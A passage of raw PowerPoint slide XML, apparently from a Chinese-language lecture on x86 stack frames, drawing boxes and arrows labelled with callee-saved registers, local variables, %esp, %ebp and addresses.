                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{414C51AD-75B3-41CF-A736-4110D8AB7C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2869325"/>
              <a:ext cx="25374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callee saved registers</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020559D6-C4E0-4B01-848E-38DCC0CB1A20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3143525"/>
              <a:ext cx="2537400" cy="49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local variables</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D328E740-EA37-48D4-B4D5-24459C945E81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3639725"/>
              <a:ext cx="2537400" cy="496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35" name="Shape 652">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2D93492-FC23-451B-A51F-519052654052}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="713400" y="3979325"/>
              <a:ext cx="1083775" cy="274200"/>
              <a:chOff x="4332275" y="4555900"/>
              <a:chExt cx="1083775" cy="274200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Shape 653">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097497BB-187F-4437-8232-CC5C8405C946}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4332275" y="4555900"/>
                <a:ext cx="641400" cy="274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dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>%esp</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="Shape 654">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23767186-FF7B-4605-A935-90B30057F43C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipH="1">
                <a:off x="4931250" y="47191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36" name="Shape 655">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2849CC3A-BF7D-4F1A-86D0-F40F04A22A43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="713400" y="2732225"/>
              <a:ext cx="641400" cy="274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dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Shape 656">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB22DC12-6E1A-444C-80C0-33A299E8E3CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="1312375" y="2865875"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 657">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F30028AE-AC57-46D1-815F-C5D106291539}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355825" y="1482900"/>
              <a:ext cx="641400" cy="2652900"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 8333"/>
                <a:gd name="adj2" fmla="val 10163"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1905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2" name="文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F43A3F6-30C7-4FC4-97CD-0062A1EBF90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4678169" y="1238535"/>
            <a:ext cx="2031325"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栈帧结构概览</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="矩形 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0DC31B-8040-4BD5-94DF-D377F36049B2}"/>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261921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组合 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC5422A4-337E-44CE-9244-AFC54EB72F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3767641" y="2417149"/>
            <a:ext cx="4239317" cy="2336869"/>
            <a:chOff x="3595739" y="2202992"/>
            <a:chExt cx="4172525" cy="2755688"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="组合 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B56D99-BF76-400F-BC87-876C390542F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3595739" y="2202992"/>
              <a:ext cx="4172525" cy="2755688"/>
              <a:chOff x="3595739" y="2202992"/>
              <a:chExt cx="4172525" cy="2755688"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2" name="矩形 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ABEE7FE-E71E-4FCA-A462-EE3963F8A83B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3595739" y="2202992"/>
                <a:ext cx="4172525" cy="2755688"/>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1" name="组合 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C34E1E2-9A50-4C29-A8F7-60420458387A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3644307" y="2250495"/>
                <a:ext cx="3284071" cy="2567020"/>
                <a:chOff x="3661496" y="2428055"/>
                <a:chExt cx="3158593" cy="2567020"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="61" name="组合 60">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51568428-B8CF-4275-B0FA-B68842863EF6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3661496" y="2428055"/>
                  <a:ext cx="2389358" cy="2567020"/>
                  <a:chOff x="3706263" y="2359416"/>
                  <a:chExt cx="2404193" cy="2567020"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="155" name="Shape 640">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DB6D03-428C-4D9B-BB78-BA0C0EC667B9}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3715632" y="3229085"/>
                    <a:ext cx="690098" cy="0"/>
                  </a:xfrm>
                  <a:prstGeom prst="straightConnector1">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                    <a:round/>
                    <a:headEnd type="none" w="med" len="med"/>
                    <a:tailEnd type="triangle" w="med" len="med"/>
                  </a:ln>
                </p:spPr>
              </p:cxnSp>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="57" name="组合 56">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98EE334-5B8D-4491-A134-67C6CD92C0EB}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="3706263" y="2359416"/>
                    <a:ext cx="2404193" cy="2567020"/>
                    <a:chOff x="3789858" y="2393512"/>
                    <a:chExt cx="2404193" cy="2567020"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="178" name="组合 177">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A11AF14D-F776-4B77-8A6E-6AE26532F9F5}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvGrpSpPr/>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr>
                    <a:xfrm>
                      <a:off x="3789858" y="2393512"/>
                      <a:ext cx="2404193" cy="2567020"/>
                      <a:chOff x="6964304" y="228815"/>
                      <a:chExt cx="2404193" cy="3175817"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="188" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F1BB3A-16C4-4291-9DAD-AB093082EAEF}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6964304" y="3369475"/>
                        <a:ext cx="690098" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="accent1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="189" name="组合 188">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C74588-32F4-4A7B-9C39-94B8EB37A8A6}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvGrpSpPr/>
                      <p:nvPr/>
                    </p:nvGrpSpPr>
                    <p:grpSpPr>
                      <a:xfrm>
                        <a:off x="6964304" y="228815"/>
                        <a:ext cx="2404193" cy="3175817"/>
                        <a:chOff x="6964304" y="228815"/>
                        <a:chExt cx="2404193" cy="3175817"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:grpSp>
                      <p:nvGrpSpPr>
                        <p:cNvPr id="207" name="组合 206">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17240478-3B4C-4DC3-BB87-0DDDE1018E3C}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvGrpSpPr/>
                        <p:nvPr/>
                      </p:nvGrpSpPr>
                      <p:grpSpPr>
                        <a:xfrm>
                          <a:off x="6964304" y="228815"/>
                          <a:ext cx="2404193" cy="3140659"/>
                          <a:chOff x="6964304" y="228815"/>
                          <a:chExt cx="2390724" cy="3140664"/>
                        </a:xfrm>
                      </p:grpSpPr>
                      <p:cxnSp>
                        <p:nvCxnSpPr>
                          <p:cNvPr id="210" name="Shape 640">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B6166A5-1E43-4F5B-8580-2DEB67567760}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvCxnSpPr>
                            <a:cxnSpLocks/>
                          </p:cNvCxnSpPr>
                          <p:nvPr/>
                        </p:nvCxnSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="6973620" y="769985"/>
                            <a:ext cx="686232" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="triangle" w="med" len="med"/>
                          </a:ln>
                        </p:spPr>
                        <p:style>
                          <a:lnRef idx="1">
                            <a:schemeClr val="accent3"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:schemeClr val="accent3"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="accent3"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="tx1"/>
                          </a:fontRef>
                        </p:style>
                      </p:cxnSp>
                      <p:cxnSp>
                        <p:nvCxnSpPr>
                          <p:cNvPr id="211" name="Shape 640">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B19BCA78-2792-4ABC-9C22-1360B65B969C}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvCxnSpPr>
                            <a:cxnSpLocks/>
                          </p:cNvCxnSpPr>
                          <p:nvPr/>
                        </p:nvCxnSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="6973620" y="1842835"/>
                            <a:ext cx="686232" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:schemeClr val="accent1">
                                <a:lumMod val="50000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="triangle" w="med" len="med"/>
                          </a:ln>
                        </p:spPr>
                      </p:cxnSp>
                      <p:cxnSp>
                        <p:nvCxnSpPr>
                          <p:cNvPr id="212" name="Shape 640">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78802C43-B70C-43B0-AEB4-68ADCABE255E}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvCxnSpPr>
                            <a:cxnSpLocks/>
                          </p:cNvCxnSpPr>
                          <p:nvPr/>
                        </p:nvCxnSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="6964304" y="3102104"/>
                            <a:ext cx="686232" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:schemeClr val="accent1">
                                <a:lumMod val="50000"/>
                              </a:schemeClr>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="triangle" w="med" len="med"/>
                          </a:ln>
                        </p:spPr>
                      </p:cxnSp>
                      <p:grpSp>
                        <p:nvGrpSpPr>
                          <p:cNvPr id="213" name="组合 212">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372068C0-8AFA-4A4B-939F-6008F7308B34}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvGrpSpPr/>
                          <p:nvPr/>
                        </p:nvGrpSpPr>
                        <p:grpSpPr>
                          <a:xfrm>
                            <a:off x="7054111" y="228815"/>
                            <a:ext cx="2300917" cy="3140664"/>
                            <a:chOff x="7054111" y="228815"/>
                            <a:chExt cx="2300917" cy="3140664"/>
                          </a:xfrm>
                        </p:grpSpPr>
                        <p:sp>
                          <p:nvSpPr>
                            <p:cNvPr id="214" name="Shape 636">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A3D507-9787-4922-BC8E-59271EEF9B0E}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvSpPr/>
                            <p:nvPr/>
                          </p:nvSpPr>
                          <p:spPr>
                            <a:xfrm>
                              <a:off x="7057318" y="2826951"/>
                              <a:ext cx="1284068" cy="367593"/>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000" dirty="0">
                                  <a:latin typeface="Consolas"/>
                                  <a:ea typeface="Consolas"/>
                                  <a:cs typeface="Consolas"/>
                                  <a:sym typeface="Consolas"/>
                                </a:rPr>
                                <a:t>addr7</a:t>
                              </a:r>
                              <a:endParaRPr sz="1000" dirty="0">
                                <a:latin typeface="Consolas"/>
                                <a:ea typeface="Consolas"/>
                                <a:cs typeface="Consolas"/>
                                <a:sym typeface="Consolas"/>
                              </a:endParaRPr>
                            </a:p>
                          </p:txBody>
                        </p:sp>
                        <p:grpSp>
                          <p:nvGrpSpPr>
                            <p:cNvPr id="215" name="组合 214">
                              <a:extLst>
                                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B738AF-A4F8-4B18-99CC-0F08643FDCC6}"/>
                                </a:ext>
                              </a:extLst>
                            </p:cNvPr>
                            <p:cNvGrpSpPr/>
                            <p:nvPr/>
                          </p:nvGrpSpPr>
                          <p:grpSpPr>
                            <a:xfrm>
                              <a:off x="7054111" y="228815"/>
                              <a:ext cx="2300917" cy="3140664"/>
                              <a:chOff x="7054111" y="228815"/>
                              <a:chExt cx="2300917" cy="3140664"/>
                            </a:xfrm>
                          </p:grpSpPr>
                          <p:sp>
                            <p:nvSpPr>
                              <p:cNvPr id="216" name="Shape 636">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{236341E9-46C6-4650-9D13-A33B3C6FDDDB}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvSpPr/>
                              <p:nvPr/>
                            </p:nvSpPr>
                            <p:spPr>
                              <a:xfrm>
                                <a:off x="7057318" y="462139"/>
                                <a:ext cx="1277850" cy="42458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000" dirty="0">
                                    <a:latin typeface="Consolas"/>
                                    <a:ea typeface="Consolas"/>
                                    <a:cs typeface="Consolas"/>
                                    <a:sym typeface="Consolas"/>
                                  </a:rPr>
                                  <a:t>add</a:t>
                                </a:r>
                                <a:r>
                                  <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                                    <a:latin typeface="Consolas"/>
                                    <a:ea typeface="Consolas"/>
                                    <a:cs typeface="Consolas"/>
                                    <a:sym typeface="Consolas"/>
                                  </a:rPr>
                                  <a:t>r</a:t>
                                </a:r>
                                <a:r>
                                  <a:rPr lang="en-US" sz="1000" dirty="0">
                                    <a:latin typeface="Consolas"/>
                                    <a:ea typeface="Consolas"/>
                                    <a:cs typeface="Consolas"/>
                                    <a:sym typeface="Consolas"/>
                                  </a:rPr>
                                  <a:t>15</a:t>
                                </a:r>
                                <a:endParaRPr sz="1000" dirty="0">
                                  <a:latin typeface="Consolas"/>
                                  <a:ea typeface="Consolas"/>
                                  <a:cs typeface="Consolas"/>
                                  <a:sym typeface="Consolas"/>
                                </a:endParaRPr>
                              </a:p>
                            </p:txBody>
                          </p:sp>
                          <p:sp>
                            <p:nvSpPr>
                              <p:cNvPr id="217" name="Shape 636">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29524102-240F-4CF9-8F4A-DF6D08D5E314}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvSpPr/>
                              <p:nvPr/>
                            </p:nvSpPr>
                            <p:spPr>
                              <a:xfrm>
                                <a:off x="7054111" y="1556019"/>
                                <a:ext cx="1280004" cy="387028"/>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000" dirty="0">
                                    <a:latin typeface="Consolas"/>
                                    <a:ea typeface="Consolas"/>
                                    <a:cs typeface="Consolas"/>
                                    <a:sym typeface="Consolas"/>
                                  </a:rPr>
                                  <a:t>addr11</a:t>
                                </a:r>
                                <a:endParaRPr sz="1000" dirty="0">
                                  <a:latin typeface="Consolas"/>
                                  <a:ea typeface="Consolas"/>
                                  <a:cs typeface="Consolas"/>
                                  <a:sym typeface="Consolas"/>
                                </a:endParaRPr>
                              </a:p>
                            </p:txBody>
                          </p:sp>
                          <p:grpSp>
                            <p:nvGrpSpPr>
                              <p:cNvPr id="218" name="组合 217">
                                <a:extLst>
                                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2D86B6-F635-4F8D-BFF5-B3EBA4340DB7}"/>
                                  </a:ext>
                                </a:extLst>
                              </p:cNvPr>
                              <p:cNvGrpSpPr/>
                              <p:nvPr/>
                            </p:nvGrpSpPr>
                            <p:grpSpPr>
                              <a:xfrm>
                                <a:off x="7645479" y="228815"/>
                                <a:ext cx="1709549" cy="3140664"/>
                                <a:chOff x="7645479" y="228815"/>
                                <a:chExt cx="1709549" cy="3140664"/>
                              </a:xfrm>
                            </p:grpSpPr>
                            <p:grpSp>
                              <p:nvGrpSpPr>
                                <p:cNvPr id="220" name="组合 219">
                                  <a:extLst>
                                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E498ACE9-2AE5-458D-B9A6-AC7AD8C9C274}"/>
                                    </a:ext>
                                  </a:extLst>
                                </p:cNvPr>
                                <p:cNvGrpSpPr/>
                                <p:nvPr/>
                              </p:nvGrpSpPr>
                              <p:grpSpPr>
                                <a:xfrm>
                                  <a:off x="7645479" y="228815"/>
                                  <a:ext cx="1709549" cy="2874095"/>
                                  <a:chOff x="7645479" y="228815"/>
                                  <a:chExt cx="1709549" cy="2874095"/>
                                </a:xfrm>
                              </p:grpSpPr>
                              <p:sp>
                                <p:nvSpPr>
                                  <p:cNvPr id="221" name="Shape 621">
                                    <a:extLst>
                                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092A26C5-63EA-4342-884F-147EFADFED0B}"/>
                                      </a:ext>
                                    </a:extLst>
                                  </p:cNvPr>
                                  <p:cNvSpPr/>
                                  <p:nvPr/>
                                </p:nvSpPr>
                                <p:spPr>
                                  <a:xfrm>
                                    <a:off x="7650538" y="228815"/>
                                    <a:ext cx="1704489" cy="270722"/>
                                  </a:xfrm>
                                  <a:prstGeom prst="rect">
                                    <a:avLst/>
                                  </a:prstGeom>
                                  <a:solidFill>
                                    <a:schemeClr val="accent5">
                                      <a:lumMod val="60000"/>
                                      <a:lumOff val="40000"/>
                                    </a:schemeClr>
                                  </a:solidFill>
                                  <a:ln w="9525" cap="flat" cmpd="sng">
                                    <a:solidFill>
                                      <a:schemeClr val="accent1">
                                        <a:lumMod val="50000"/>
                                      </a:schemeClr>
                                    </a:solidFill>
                                    <a:prstDash val="solid"/>
                                    <a:round/>
                                    <a:headEnd type="none" w="sm" len="sm"/>
                                    <a:tailEnd type="none" w="sm" len="sm"/>
                                  </a:ln>
                                </p:spPr>
                                <p:txBody>
                                  <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                                    <a:noAutofit/>
                                  </a:bodyPr>
                                  <a:lstStyle/>
                                  <a:p>
                                    <a:pPr lvl="0" algn="ctr"/>
                                    <a:r>
